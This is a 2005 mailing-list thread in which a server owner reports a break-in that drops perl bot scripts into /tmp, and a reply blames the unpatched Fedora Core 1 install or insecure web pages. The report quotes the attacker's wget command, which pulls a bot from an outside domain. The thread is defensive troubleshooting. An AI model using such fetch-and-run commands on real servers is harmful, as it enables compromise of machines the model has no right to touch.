On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx <paul@xxxxxxxxxxxxxxxxxxx> wrote: > Apparently someone has hacked into my webserver. And is installing perl > scripts into he /tmp/ directory. There usually named .linuxday* or > .cinta* and a few other names as well. > > >From what I can tell something is causing apache to run a command like "sh > wget bot.linuxday.com.br -O {the above mentioned files are than listed}" > > sometimes the site is worm.linuxday.com.br > > I'm curious if anyone has heard about this before. I'm currently running > Fedora 1 with all the latests security patches. fc1 has reached EOL some time ago, and only fedora legacy releases additional updates for it. could be that you are vulnerable because some fixes are missing. also could be that your web pages are insecure. php or perl pages maybe? -- Bernd